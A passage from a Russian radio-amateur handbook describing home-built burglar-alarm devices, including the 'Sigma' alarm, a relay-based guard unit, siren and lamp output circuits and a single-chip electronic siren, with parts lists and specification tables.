В УС типа «Сигма» применяются следующие покупные комплектующие ЭРЭ и изделия: сетевой понижающий трансформатор питания 77 типа Ш броневой конструкции; ИМС DA1 типа КР1006ВИ1, DA2 — КР1006ВИ1; транзисторы VTI типа МП42Б, VT2 — П213, VT3 — КТ817В, VT4 — КТ630Д, VT5 — КТ3102Д, VT6 — КТ3107Б, VT7 — КТ3107Б, VT8 — КТ3102Д; выпрямительные диоды VD1 типа КД220Г, VD2 — VD5 — Д226; стабилитроны VD6 типа Д814Д, VD7 — Д814А;

конденсаторы С1 типа К50-3-25В-2000 мкФ, С2 — К50-3-25В-500 мкФ, СЗ — К50-3-25В-1000 мкФ, С4 — К10-7В-25В-Н90-0,01 мкФ, С5 — К50-3-25В-470 мкФ, С6 — К73-5-0.22 мкФ; резисторы R1 типа С5-35-ЗВТ-7 Ом, R2 — ВСа-0,5-360 Ом, R3 — СП4-2Ма-1Вт-10 кОм, R4 — ВСа-0,5-1 кОм, R5 — ВСа-0,5-1 кОм, R6 — ВСа-0,125-2,2 кОм, R7 — ВСа-0,125-2,2 кОм, R8 — ВСа-0,125-680 Ом, R9 — ВСа-0,125-2,2 кОм, R10 — ВСа-0,125-10 кОм, R11 — ВСа-0,125-2,2 кОм, R12 — ВСа-0,125-150 кОм, R13 — ВСа-0,125-18 кОм, R14 — ВСа-0,125-3,3 кОм, R15 — ВСа-0,125-1 МОм; громкоговоритель ВА1 типа 6ГД-6; аккумуляторная батарея GB1 с выходным напряжением 12 В (например, автомобильный аккумулятор или 10НКГ-10Д); предохранитель F1 типа ПМ-1-0,5 А; электрический соединитель X1 типа «вилка» с электрическим кабелем в двойной изоляции длиной 1,5 м; ИП РА1 типа 4200 постоянного тока, с точностью отсчета не ниже класса 1,5; переключатели S1 типа ТВ2-1-2, S2 — П1Т-1-1, S3 — S6 типа МП-7; индикаторные лампы HI типа МН-6,3-0,22 А, Н2 — МН-12В-0.26 А.

При монтаже, сборке, регулировке и ремонте электронного УС могут быть применены другие комплектующие ЭРЭ, не ухудшающие его основные электрические параметры и эксплуатационные характеристики. В частности, выпрямительные диоды тина Д226 можно заменить на диоды типов Д229, Д237А или на диодную сборку тина КЦ402Е; оксидные электролитические конденсаторы типа К50-3 — на К50-6, К50-12, К50-16, К50-20; резисторы тина ВСа — на МЛТ, ОМЛТ, МТ, С1-4, УЛИ, С2-8;

сигнальную лампу HI типа МН6, 3-0, 22 А — на лампы типов КИ-6-60, МН-6,3—0, 3 А; стабилитрон типа Д814Д — на Д813. В устройстве может быть применен любой звукоизлучатель с сопротивлением катушки 8 Ом.

Моточные данные сетевого самодельного трансформатора питания Т1 приведены в табл. 2. 5.

Здесь, видимо, целесообразно еще раз напомнить о необходимости соблюдать требования техники электро- и пожарной безопасности. Большинство элементов схемы устройства, и особенно подключенные к промышленной сети переменного тока, могут находиться под напряжением. Поэтому запрещается касаться схемы руками или инструментом с неизолированной рукояткой до тех пор, пока устройство не будет отключено от электрической сети.

Таблица 2. 5. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в устройстве сигнализации типа «Сигма»

2-31.jpg

Основные технические характеристики устройства сигнализации типа «Сигма»

Номинальное напряжение питающейсети

переменного тока, В.................... 220

Номинальная частота питающей сети переменного тока, Гц.............................50

Номинальное напряжение питания автономного

источника ХИТ, В..................... 12

Пределы изменения напряжения питающей сети переменного тока, при которых сохраняется устойчивая работоспособность УС, В......... 180... 240

Пределы изменения частоты питающей сети

переменного тока, Гц................... 49, 5... 50.5

Выходное стабилизированное напряжение БП (максимальное значение), В............... 15

Пределы регулирования выходного напряжения на стабилизаторе, В.................... 3... 15

Максимальный ток нагрузки, мА............. 300

Ток срабатывания защитного устройства, мА..... 400

Ток, потребляемый устройством в ждущем режиме холостого хода, мА, не более.......... 6

Коэффициент стабилизации напряжения постоянного тока, не менее..................... 200

Коэффициент нелинейных искажений питающей сети переменного тока, %, не более......... 12

Амплитуда пульсации стабилизированного напряжения постоянного тока, мВ, не более........ 8

Номинальная мощность УС, Вт, не менее....... 30

Выходная мощность звуковой сирены,Вт, не менее............................ 5

Максимальное количество контролируемых объектов охраны одновременно, шт.............. 20

Частота звуковых сигналов, Гц.............. 10... 20 000

Сопротивление изоляции токоведущих частей устройства между собой и между металлическим корпусом, МОм, не менее................ 10

Готовность устройства к эксплуатации после

включения электропитания, с.............. 1

Время срабатывания устройства после замыкания контактов переключателей, мс.......... 0, 2

Электрическая прочность изоляции токоведущих частей при нормальных условиях эксплуатации УС, В, не менее....................... 500

Вероятность безотказной работы УС при риске заказчика в =0, 92, не менее............... 0, 96

Срок службы устройства, ч, не менее.......... 5000

Помехозащищенность устройства, выполненною в металлическом корпусе при воздействии внешнего электромагнитного поля, дБ........ 100

кпд, %, не менее........................ 95

t21.jpg

Рис. 2. 2. Принципиальная схема устройства сигнализации типа "Сигма".

Рис. 2.2. Принципиальная схема устройства сигнализации типа "Сигма".

Изображение: 

Таблица 2. 5. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в устройстве сигнализации типа «Сигм

Изображение: 

2. 5. Простое электронно-релейное охранное устройство

2. 5. ПРОСТОЕ ЭЛЕКТРОННО-РЕЛЕЙНОЕ ОХРАННОЕ УСТРОЙСТВО

Рассматриваемое охранное устройство в комплекте, состоящем из БЭ, исполнительного устройства, датчиков и громкоговорящей установки, представляет собой но существу систему предупредительной сигнализации.

Электронно-релейное сторожевое устройство, включающее в свой состав два электромагнитных реле и современные ППП, предназначено для охраны различных объектов и в первую очередь жилых помещений от проникновения посторонних лиц. По договоренности с жильцами соседних квартир сигнальные элементы схемы могут быть установлены у них, чем достигается дополнительная охрана. Настоящее устройство может быть использовано для охраны хозяйственных построек на садово-огородных участках, гаражей, производственных помещений и автомобилей. Электропитание охранного устройства осуществляется от сети переменного тока напряжением 220 или 127 В частотой 50 Гц, а также от автономного источника питания напряжением 12 В. От аккумуляторной батареи устройство начинает работать сразу же после отключения от сети переменного тока. Устройство сохраняет работоспособность при напряжении электропитания от автономного источника от 9 до 15 В постоянного тока.

Принципиальная электрическая схема охранного устройства приведена на рис. 2. 4. Устройство включает в свой состав входные цепи, устройство подключения к источникам питания, сетевой понижающий трансформатор питания T1, полупроводниковый выпрямитель c емкостным фильтром, ПСН, электронное реле времени, сигнальный узел с исполнительным устройством и сигнальные цепи.

Конструкция охранного устройства должна предусматривать в своем составе не только отсек для установки внутреннего автономного источника питания, но и возможность подключения к выходным зажимным клеммам Х2 и ХЗ дополнительного источника питания постоянного тока. Допускается использовать в качестве встроенною источника электропитания аккумуляторы типа НКГЦ 35-1 или 10НКГ-10Д. Но предпочтительнее использовать, первый тип аккумулятора, так как он по своим габаритным размерам аналогичен элементам ХИТ типа 373.

В качестве дополнительного внешнего источника напряжением от 9 до 15 В постоянного тока может быть использован покупной БП с током нагрузки не менее 0,6 А и амплитудой пульсации выпрямленного напряжения не более 0,5 В, а также автомобильный аккумулятор с аналогичными параметрами. При этом в случае преднамеренного обесточения (отключения) внешнего электропитания устройство охраны автоматически переходит на автономное питание от встроенных батареи. При подключении внешнего источника необходимо соблюдать полярность. К контактному зажиму Х2 всегда подключается «плюс», а к зажиму Х.3 — «минус».

Входное устройство обеспечивает подключение системы к сети переменного тока напряжением 220 или 127 В частотой 50 Гц с помощью электрического соединителя X1 типа «вилка», который смонтирован с электрическим кабелем длиной от 1,5 до 2,3 м. Сетевые плавкие предохранители F1 и F2 защищают входные цени от коротких замыканий и перегрузок, которые могут возникнуть из-за неправильного монтажа или неисправности комплектующих ЭРЭ. Включение и выключение электропитания осуществляется двухполюсным переключателем S1. Параллельно первичной обмотке сетевого трансформатора включен конденсатор С1 в качестве помехоподавляющего фильтра. Сетевой понижающий трансформатор питания Т1 изготавливается на магнитопроводе типа Ш бро-

Таблица 2.7. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в простом электронно-релейном охранном устройстве

2-51.jpg

 

невой конструкции. Трансформатор имеет одну катушку с тремя обмотками. Катушка устанавливается на центральном стержне магнитопровода, активная площадь поперечного сечения стали которого должна быть не менее 5 см2. Напряжение питания 220 В подается на выводы 1 и 3, напряжение 127 В — на выводы 1 и 2. На вторичной обмотке трансформатора в режиме холостого хода действует напряжение 13,3 В переменного тока. Моточные данные сетевого понижающего трансформатора питания Т1 приведены в табл. 2.7. Сетевой трансформатор кроме основной функции — трансформации напряжения до значения необходимого для работы охранного устройства — обеспечивает гальваническую развязку вторичных электронных цепей от сети переменного тока высокого напряжения и дополнительную электробезопасность при работе с низким вторичным напряжением.

Переменное напряжение со вторичной обмотки трансформатора поступает на полупроводниковый выпрямитель неуправляемого типа, собранный на четырех выпрямительных диодах VD1—VD4 по однофазной двухполупериодной мостовой схеме, которая имеет ряд преимуществ по сравнению с другими выпрямительными схемами. Выпрямитель дает на выходе повышенную частоту пульсации выпрямленного напряжения постоянного тока, пониженное обратное напряжение на комплекте выпрямительных диодов, обеспечивает полное использование габаритной мощности сетевого трансформатора. Одновременно выпрямители данного типа обладают и некоторыми недостатками: повышенными потерями, которые снижают общий кпд охранного устройства, повышенным расходом выпрямительных диодов — четыре вместо двух или одного, невозможностью установки диодов одинаковых типов на металлическом радиаторе без

изоляционных прокладок, более высокой стоимостью изготовления и повышенной технологической сложностью.

На выходе выпрямителя собран емкостный фильтр, сглаживающий пульсации выпрямленного напряжения постоянного тока. Выпрямитель работает на емкостную нагрузку, выполненную на оксидных электролитических конденсаторах С2 и СЗ.

Выпрямленное напряжение со сглаживающего фильтра подается на стабилизатор напряжения нерегулируемого параметрического типа, который собран па стабилитроне VD5 и транзисторе VT2. Резистор R6, включенный между эмиттером транзистора VT3 и базой транзистора VT2, поддерживает нормальный режим работы регулирующего транзистора при отключенных устройствах сигнализации и электронного реле времени. Транзистор VT2 работает в режиме эмиттерного повторителя. Выходное стабилизированное напряжение равно 12 В. Напряжение пульсации на выходе стабилизатора при токе нагрузки 100 мА не превышает 5 мВ.

В схеме БЭ охранного устройства собрана система защиты от перегрузок и коротких замыканий в цепях сигнализации и на выходе устройства в нагрузке. Система защиты включает в свой состав резисторы R1, R2, R3, транзистор VT1 и два электромагнитных реле K1 и К.2. Система защиты от коротких замыканий работает следующим образом. При перегрузке как только ток, протекающий через резистор R1, превысит установленное значение (от 100 мА и выше), открывается транзистор VT1 и напряжение поступает на электромагнитное реле К2. После срабатывания реле замыкаются его контакты К2.1, через которые напряжение питания подается на обмотку реле K7, это реле также срабатывает, его контакты K1.1 размыкаются и отключают нагрузку и электронную схему сигнализации от электропитания. В устройстве защиты предусмотрена сигнальная лампа Н2, которая обеспечивает более четкое срабатывание системы защиты и сигнализирует о перегрузке. Суммарный ток, протекающий через лампу Н2 и далее через стабилизатор напряжения и балластный резистор R3, при отсутствии нагрузки должен несколько превышать ток срабатывания защиты, в противном случае при коротком замыкании в нагрузке контакты электромагнитного реле K1 будут периодически замыкаться и размыкаться. Для

устранения этого явления необходимо провести регулировку подбором сопротивлений резисторов, входящих в указанную цепочку.

Реле времени охранного устройства собрано на транзисторах VT3, VT4, электромагнитном реле КЗ и стабилитронах VD6 и VD9. Сигнальное устройство выполнено на транзисторах VT5—VT8 и выпрямительных диодах VD7, VD8 и VD10.

На дверях и окнах устанавливаются переключатели S3, S4, контакты которых замыкаются при их открывании, что приводит к запуску реле времени. При выбранных номиналах комплектующих изделий и ЭРЭ, указанных на схеме, реле времени работает 20 мин. Одновременно с началом работы реле времени срабатывает устройство запуска электрического звонка и сигнального устройства. Тактовый генератор и генератор звуковой частоты обеспечивают генерирование периодически прерывающегося сигнала тревоги, подаваемого через громкоговорители, которые устанавливаются в различных точках охраняемых помещений и, как ранее указывалось, у соседей по этажу.

Проводку и монтаж всей охранной системы необходимо выполнять проводниками в прочной изоляции, в том числе от датчиков к БЭ и до сирены, выходная мощность которой достигает 5 Вт.

Отключение сигнального устройства осуществляется специальной кнопкой, расположение которой в помещении должно быть известно только его хозяевам. Общее отключение охранного устройства от источников питания обеспечивается переключателями S1 и S2. При этом переключатель S2 позволяет работать охранному устройству в дежурном режиме. Аккумуляторная батарея вступает в работу только в том случае, когда напряжение на ней больше напряжения, вырабатываемого стабилизатором напряжения. Включением контактов переключателей S2 и S8 аккумуляторная батарея может быть поставлена на подзарядку.

Относительно простое схемно-техническое решение и доступность приобретения примененных в охранном устройстве комплектующих изделий и ЭРЭ позволяют почти без трудностей повторить его даже начинающим радиолюбителям. Конструкция устройства должна быть выполнена по блочно-модульному типу с применением печатного и навесного монтажа.

При изготовлении охранного устройства использованы следующие комплектующие ЭРИ и ЭРЭ: сетевой понижающий трансформатор питания Т1 броневой конструкции типа Ш;

транзисторы VTI типа КТ342А, VТ2 — П1214В, VT3 — КТ201В, VT4 — П214Б, VT5 — П307А, VТ6 — КТ201Г, VT7 — КТ312Б, VT8 КТ201Г; выпрямительные диоды VD1—VD4 типа Д223А, VD7 - КД105Б, VD8 - КД105Б, VD10 — КД105Б, VD11-КД105Б, VD12 — Д237А; стабилитроны VD5 типа Д815Е, VD6 - Д814Д, VD9-Д814В; конденсаторы С1 типа МБМ-11-630В-0,1 мкФ, С2 — К50-6-25В-500 мкФ, СЗ -- К50-6-25В-500 мкФ, С4 — К10-7В-25В-0,0047 мкФ, С5 — К10-50-25В-1,5 мкФ, С6 — К50-6-16В-2200 мкФ, С7 — К50-6-16В-20 мкФ; резисторы R1 типа МЛТ-0,25-6,8 Ом, R2 — МЛТ-0,25-3,9 кОм, R3 — МЛТ-0,25-100 Ом, R4 — МЛТ-2-560 Ом, R5 — МЛТ-0,25-220 Ом, R6 — МЛТ-2-2,2 кОм, R7 — МЛТ-0,25-1,2 кОм, R8 — МЛТ-0,5-150 Ом, R9 — МЛТ-0,25-560 кОм, R10-МЛТ-0,25-240 кОм, R11 — МЛТ-0,25-560 Ом, R12 — МЛТ-0,25-6,8 кОм, R13 — МЛТ-0,5-150 кОм, R14 — МЛТ-0,5-12 кОм, R15 — МЛТ-0,5-47 кОм, R16 — МЛТ-2-47 кОм, R17 — СП4-1а-0,5Вт-2,0 МОм, R18 — СП4-1а-47 кОм; индикаторная лампа H1 типа МН-6,3-0,22А, Н2 — К6-60; переключатели S1 типа П2Т-1-1, S2 — П1Т-1-1, S3 — КМ1-1, S4 — КМ1-1, S5 — КМ1-1, S6 — П1Т-1-1, S7 — П1Т-1-1, S8 — ТВ2-1-2; предохранители F1 типа ПМ1-0.5A, F2 — ПМ1-0,5 А;

аккумуляторная батарея GB1 типа 12ЦНК-0.85 (или рекомендованные выше); электромагнитные реле К1 типа РЭС-10 (паспорт РС4.524.303), К2 — РЭС-15 (паспорт РС4.591.003), КЗ — РЭС-9; электрические соединители X1 типа «вилка» с электрическим кабелем с двойной изоляцией длиной не менее 1,5 м, Х2, ХЗ типа КМЗ-1; громкоговорители ВА1, ВА2, мотоциклетная сирена ВАЗ; исполнительный механизм ИМ1 (на схеме не показан) включается в работу контактами электромагнитного реле КЗ.2.

При регулировке и ремонте охранного устройства могут быть применены другие аналогичные комплектующие ЭРЭ, не ухудшающие его основные электрические параметры и эксплуатационные характеристики. Транзисторы типа КТ342А можно заменить на транзисторы типов КТ342Б, КТ342Г, КТ301В, КТ312Б, КТ315В, КТ315Г, транзистор типа П214В — на П214А, П214Б, П214Г, П215, транзистор типа КТ201Г — на КТ312Б; выпрямительные диоды типа Д223 — на Д226А, КД105 с любым буквенным индексом, диоды типа КД105Б — на Д220А;

резисторы типа МЛТ — на ВС, ВСа, ОМЛТ, УЛИ, МТ, С1-4; конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К50-20.

Регулировка охранного устройства .заключается в установке постоянного тока, протекающего через стабилитрон VD5, и тока срабатывания системы защиты подбором сопротивления резистора R1. Правильно собранное устройство работает сразу же после монтажа, обеспечивая все основные электрические характеристики.

В практической деятельности мастерам-радиолюбителям часто приходится выбирать и применять различные ИМ и устройства, электропитание которых может осуществляться или от сети переменного тока, или от вторичных автономных источников питания. В качестве ИМ в СОС используются осветительные и сигнальные лампы, акустические преобразователи и механические или электромеханические устройства автоматического действия. При этом количество таких устройств в одной СОС может колебаться от одного до нескольких десятков. В последнее время все чаще начинают применяться радиотехнические и радиоэлектронные излучатели и оповещатели, которые устанавливаются на охраняемых объектах и ЦПУ и работают в строго установленном диапазоне частот.

Для начинающих радиолюбителей достаточно сложной является задача правильного включения и срабатывания сторожевого устройства, надежная, устойчивая и долговечная работа исполнительных механизмов. Принципиально включение исполнительных механизмов в работу можно свести к нескольким простым схемам, которые рассматриваются ниже и могут быть использованы радиолюбителями.

Исполнительные механизмы работают в выходных цепях охранных устройств и должны выдавать информацию и обеспечивать надлежащую охрану объектов при условии, когда конкретные охраняемые помещения позволяют без каких-либо изменений использовать рассматриваемые в справочнике сторожевые устройства. Подача звуковых или мигающих оптических сигналов в большинстве случаев может быть осуществлена с помощью простых устройств, в которых формируются сигналы, показывающие состояние контролируемых помещений и объектов.

На рис. 2.5 даны принципиальные схемы возможных вариантов включения исполнительных устройств, которые могут быть применены в схемах охранной сигнализации. Включение ИМ в работу не зависит от примененного источника электропитания: сети переменного тока или ХИТ.

2-52.jpg

Рис. 2. 5. Принципиальные схемы включения исполнительных звуковых и световых
устройств.

На рис. 2. 4 исполнительное устройство ВАЗ показано в условном варианте включения, которое зависит от его электропитания переменным или постоянным током, от фактического значения напряжения питающей сети, а также от конструкции выбранного ИМ. Применив в качестве сторожевого сигнализатора динамическую головку ВА1, можно воспользоваться схемой, приведенной на рис. 2. 5, а.

Работает исполнительное устройство в автономном режиме питания от ХИТ напряжением 4, 5 В при замыкании контактов реле К1.1 и одновременном размыкании контактов К1.2. Сам сигнализатор собран, на четырех транзисторах VT1-VT4, которые образуют два мультивибратора. Первый мультивибратор собран на транзисторах VT3—VT4, второй — на VТ1—VT2.

Для изготовления сторожевого сигнализатора (рис. 2.5, а) использованы следующие комплектующие ЭРЭ: транзисторы VTI типа КТ316А, VT2 — ГТ402А, VT3 — КТ316А, VT4 — ГТ402А; резисторы R1 типа МЛТ-0,25-75 кОм, R2 — МЛТ-0,25-5,6 кОм, R3 — МЛТ-0,25-300 Ом, R4 — МЛТ-0,25-1 кОм, R5 — МЛТ-0,25-75 кОм, R6 — МЛТ-0,25-5,6 кОм, R7 — МЛТ-0,25-300 Ом, R8 — МЛТ-0,25-1 кОм; конденсаторы С1 типа К50-3-6В-10 мкФ, С2 — К50-3-6В-10 мкф, СЗ — К50-3-6В-50 мкФ, С4 — К10-7В-25В-0,068 мкФ. В качестве звукоизлучателя можно применить громкоговоритель с сопротивлением звуковой катушки до 10 Ом.

Если в качестве ИМ будет принят данный сигнализатор, то необходимо учитывать, что его работа осуществляется только после срабатывания реле КЗ электронно-релейного охранного устройства (рис. 2.4).

Па рис. 2.5, б рассматривается схема исполнительного устройства с промежуточным управлением включения индикаторной лампы и акустического излучателя звуковой частоты. Как видно из схемы, это устройство содержит понижающий трансформатор Т1, на вторичной обмотке которого должно действовать переменное напряжение в пределах 8...12 В; однофазный двухполупериодный мостовой выпрямитель, собранный на четырех диодах VD1, VD2, VD4, VD5 с емкостным фильтром, который выполнен на оксидном конденсаторе С2; электронное реле выдержки времени, собранное на двух транзисторах VT1 и VT2 и электромагнитном реле К1. Времязадающая цепочка R1, C1 и R2 определяет длительность горения индикаторной лампы H1.

Работает данное устройство следующим образом. После срабатывания электромагнитного реле КЗ (рис. 2. 4) его контакты К3.1 смыкаются и подают напряжение питания на сетевой трансформатор Т1.В это время подаемся акустический сигнал от сирены ВА1, начинает работать выпрямитель, постоянное напряжение которого заряжает конденсатор С2. Почти одновременно начинает заряжаться конденсатор C1 и после этого открывается составной транзистор и электромагнитное реле К1 срабатывает. Его контакты К.1.1 замыкаются и включают индикаторную лампу H1, контакты К1.2 подключают первичную обмотку понижающего трансформатора к сети питания. После того как основная схема (рис. 2.4) будет отключена и реле КЗ вновь разомкнет свои контакты КЗ.1, данное устройство будет продолжать работать.

Для отключения устройства необходимо разомкнуть контакты переключателя S1, который устанавливается скрытно.

При изготовлении исполнительного устройства использованы следующие комплектующие ЭРЭ: транзисторы VT1 типа КТ315Б, VT2 — КТ315Б; резисторы R1 типа МЛТ-0,25-510 кОм, R2 — МЛТ-0,25-1 МОм; выпрямительные диоды VD1—VD5 типа КД105Б; конденсаторы С1 типа К50-6-20В-500 мкФ, С2 — К50-6-20В-1000 мкФ; электромагнитное реле К1 типа РЭС32; сирена ВА1 с напряжением электропитания переменным током 220 В; лампа накаливания H1.

На рис. 2.5, в показана схема включения исполнительного устройства, представляющего собой генератор акустических сигналов.

Так же как и в ранее рассмотренных схемах, подключается данное устройство к источнику электропитания после срабатывания реле КЗ по схеме, приведенной на рис. 2.4.

При изготовлении данного устройства использованы следующие ЭРЭ: транзисторы VT1 типа МП20Б, VT2 — ГТ322Б, VT3 — ГТ322Б; резисторы R1 типа МЛТ-0,25-100 Ом, R2 — МЛТ-0,25-2,7 кОм, R3 — МЛТ-0,25-1,5 кОм, R4 — МЛТ-0,25-150 Ом, R5, R6 — МЛТ-0,5-10 кОм, R7 — МЛТ-0,25-1,5 кОм;

конденсаторы С1, С2 типа К10-17-25В-0,47 мкФ; лампа накаливания Н1 с номинальным напряжением питания 220 В; электрические соединители X1—Х4 типа КМЗ-1 приборные; громкоговоритель с сопротивлением звуковой катушки 15 Ом.

После срабатывания электромагнитного реле КЗ (рис. 2.4) его контакты КЗ.1 и КЗ.2 замыкаются, подавая напряжение питания на сигнальное устройство. Источником питания может служить аккумуляторная батарея или другой ХИТ, который подключается в точках А и Б с соблюдением указанной на схеме полярности. Схема представляет собой мультивибратор, собранный на транзисторах VT2, VT3, с оконечным каскадом для получения акустического сигнала на транзисторе VT1. В мультивибраторе можно использовать практически любые германиевые транзисторы низкой и высокой частоты и коэффициентом передачи тока не менее 40...50, например ГТ322Б, МП21Д, ГТ109Г, ГТ308Б, ГТ309Г, ГТ309Е (VT2, VT3), а также МП21Д, МП25Б, МП26Б, МП41, МП42Б (VTI).

Ток на оконечный каскад подается только на время генерирования сигнала. Для запуска генератора контакты ХЗ и Х4 замыкаются одновременно с замыканием контактов переключателя S1, который устанавливается на входной двери.

Основные электрические параметры и технические характеристики простого электронно-релейного сторожевого устройства

Номинальное напряжение питающей сети переменного тока, В ....................... .220 или 127

Номинальная частота питающей сети переменного тока, Гц ........................ .50

Номинальное напряжение встроенного автономного источника питания, В ............... .12

Пределы изменения напряжения питающей сети

переменного тока, В .................... .187...242 или ................................... .110...140

Пределы изменения частоты питающей сети переменного тока, Гц ..................... .49,5...50,5

Пределы изменения напряжения автономного

источника питания постоянного тока, В ....... .9...15

Напряжение переменного тока на вторичных обмотках сетевого трансформатора. В:

на выводах 5 и б ................... 6

на выводах 7 и 8 ................... 13,3

Выходное стабилизированное напряжение, В ..... .12

Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ......... .10

Коэффициент стабилизации напряжения постоянного тока, не менее .................... .150

Амплитуда пульсации выпрямленного напряжения после стабилизации, мВ, не более .......... .6

Ток, потребляемый устройством в дежурном режиме работы, мА, не более ............... .4

Время срабатывания устройства, мс, не более.... 30

Мощность, потребляемая устройством при полной

нагрузке, Вт, не более.................. 60

Время непрерывной работы тревожного сигнала

после срабатывания, мин, не менее.......... 15

Количество одновременно охраняемых объектов,

шт, в пределах....................... 1... 10

Номинальная выходная мощность на громкоговорителях, Вт....................... 15

Сопротивление изоляции токоведущих частей устройства между собой и металлическим корпусом устройства, МОм, не менее........ 10

Помехозащищенность устройства в металлическом корпусе при воздействии внешнего электромагнитного поля, дБ, не менее............... 120

Срок службы устройства, ч, не менее.......... 5000

Вероятность безотказной работы устройства

при риске заказчика в=0, 9, не менее ....... 0,97

кпд, %, не менее ....................... 75

t41.jpg

Рис. 2. 4. Принципиальная схема простого электронно-релейного охранного устройства.

Рис. 2.4. Принципиальная схема простого электронно-релейного охранного устройства.

Изображение: 

Рис. 2.5. Принципиальные схемы включения исполнительных звуковых и световых устройств.

Изображение: 

Таблица 2.7. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в простом электронно-релейном охранном

Изображение: 

2. 6. Электронное устройство охраны и сигнализации на одной микросхеме

2. 6. ЭЛЕКТРОННОЕ УСТРОЙСТВО ОХРАНЫ И СИГНАЛИЗАЦИИ НА ОДНОЙ МИКРОСХЕМЕ

Данное устройство представляет собой электронную сирену с большой выходной мощностью, оповещающую о несанкционированном вторжении в охраняемое помещение. Устройство срабатывает при открывании дверей или окон, на которых установлены конечные выключатели, работающие на замыкание контактов. Оно предназначено для охраны объектов бытового и промышленного назначения, может быть использовано для охраны автомобилей и других различных транспортных средств, если электропитание электронных цепей осуществлять от автономных источников питания, ХИТ или от бортовой электросети этих средств. Например, устройство можно установить на катере, яхте, трейлере и т. д. Простота схемно-технического и конструктивно-технологического решений и минимальное количество широко применяемых комплектующих ЭРИ и ЭРЭ делают это устройство легко доступным для изготовления в радиолюбительской лаборатории. Устройство не критично к применяемым комплектующим ЭРЭ и допускает многочисленные замены деталей и узлов без ухудшения качества работы и эксплуатационных характеристик.

Принципиальная электрическая схема электронного устройства охраны и сигнализации, собранного на одной микросхеме, приведена на рис. 2. 6. Оно включает в свой состав следующие узлы и электронные устройства: входные цепи, сетевой понижающий трансформатор питания самодельной конструкции T1, два выпрямителя напряжения нерегулируемого типа, работающих на емкостные фильтры, два стабилизатора напряжения, на выходе которых действуют постоянные токи 5 и 12 В, блок электронной сирены и АС сигнализации.

Электронное охранное устройство подключается к сети переменного тока напряжением 220 В частотой 50 Гц с помощью электрического соединителя X1 типа «вилка», смонтированного с электрическим кабелем длиной от 1,5 до 2,3 м. На входе устройства установлен плавкий пре.дохранитель F1, защищающий от коротких замыканий во входных цепях, которые могут возникнуть при неправильной сборке и монтаже, а также при использовании некачественных комплектующих ЭРЭ и ЭРИ.

Параллельно первичной обмотке сетевого трансформатора установлен конденсатор С1, который защищает от помех, проникающих в сеть переменного тока. Емкость конденсатора данного фильтра может быть изменена в два раза от указанного на схеме, а его рабочее напряжение не может быть менее двойного амплитудного значения напряжения сети.

В охранном устройстве применен самодельный сетевой понижающий трансформатор питания Т1, который изготавливается на броневом магнитопроводе типа ШЛ и имеет одну катушку. Активная площадь поперечного сечения стали магнитопровода должна быть не менее 4...4,5 см2. Первичная обмотка трансформатора Т1 рассчитана на подключение к сети напряжением только 220 В и имеет повышенную прочность изоляции, выдерживающую испытательное напряжение 500Вэфф. Две вторичные обмотки трансформатора обеспечивают на выходе напряжение переменного тока 9,3 и 22 В в режиме холостого хода. Все обмотки трансформатора питания Т1 изолированы друг от друга, экран выполнен тонким эмалированным проводом, исключающим межвитковое замыкание и заземленным на корпус трансформатора.

Трансформатор питания обеспечивает трансформацию высокого напряжения переменного тока; расчетный уровень выпрямленного напряжения, необходимого для электропитания цепей электронной схемы; полную гальваническую развязку вторичных цепей устройства от сети переменного тока; дополнительную электробезопасность эксплуатации устройства.

Выпрямительное устройство с выходным напряжением 12 В выполнено на одном выпрямительном диоде VD1 по однофазной однополупериодной схеме, характеризующейся минимальным количеством примененных полупроводниковых диодов, простотой схемного решения, невысокой стоимостью изготовления, несколько пониженной частотой пульсации выпрямленного напряжения постоянного тока, равной частоте питающей сети, недостаточным использованием габаритной мощности сетевого трансформатора питания, подмагничиванием его магнитопровода постоянным током. На выходе выпрямителя установлен емкостный фильтр, собранный на конденсаторе СЗ.

Выпрямительное устройство с выходным напряжением постоянного тока на 5 В выполнено на четырех выпрямительных диодах малой мощности VD2—VD5, собранных по однофазной двухполупериодной мостовой схеме, характеризующейся повышенной частотой пульсации выпрямленного напряжения постоянного тока, низким обратным напряжением на комплекте выпрямительных диодов, хорошим использованием габаритной мощности сетевого трансформатора Т1, повышенным падением напряжения на диодах, невозможностью установки однотипных диодов на одном радиаторе охлаждения без изоляционных прокладок, пониженным кпд эксплуатации устройства. Работает выпрямитель на емкостный фильтр, собранный на конденсаторах С4 и Сб.

Стабилизатор напряжения 12 В нерегулируемого параметрического типа собран на стабилитроне VD6 и транзисторе VTI. Стабилизатор напряжения 5 В, также параметрического типа, выполнен на стабилитроне VD7, транзисторах VT2, VT3 и диодах VD8 и VD9. Стабилизатор напряжения 5 В имеет защиту от перегрузок и коротких замыканий в цепях нагрузки. Коэффициент стабилизации напряжения 12 В в три раза ниже, чем у стабилизатора напряжения 5В. Этот стабилизатор обеспечивает электропитание предварительного каскада сигнального устройства, собранного на транзисторах VT4— VT7. Для получения повышенной выходной мощности звукового сигнала в устройство включен оконечный каскад звуковой сирены, собранный на транзисторах VT8— VT11, который получает электропитание от стабилизатора 12 В.

Электронная сирена состоит из двух генераторов, собранных на одной ИМС DA1. Первый генератор вырабатывает импульсы фиксированной частоты следования, которая зависит от емкости конденсатора С12 и сопротивления резистора R6. Резистор R5, подключенный к первому выводу ИМС, ограничивает ток на входах ИМС, защищая ее от перегрузок. Электрическая цепь, образованная резисторами R7, R11 и конденсатором С9, формирует пилообразное напряжение, управляющее частотой второго генератора. Номинальные значения сопротивлений и емкости этой цени определяют скорость нарастания и спада частоты звучания электронной сирены, а от соотношений номиналов сопротивлений резисторов R7 и R11 зависят пределы ее изменения. Тональность электронной сирены определяется вторым генератором, выводы ИМС 8...11 Частота следования импульсов второго генератора и их длительность зависят от значений сопротивлений резисторов R9, R10 и емкостей конденсаторов С10 и С11.

Предварительный каскад усилителя мощности выходного сигнала собран по схеме эмиттерных повторителей на транзисторах VT4—VT7.

При включении сигнального устройства в сеть переменного тока схема переходит в режим ожидания и срабатывает после замыкания любых контактов переключателей S2—S5. Эти переключатели устанавливаются в различных местах охраняемых объектов, и по возможности скрытно.

Выходную мощность устройства можно увеличить в 1,5...1,6 раза за счет второго каскада усилителя звуковой частоты, собранного на транзисторах VT8—VT11.

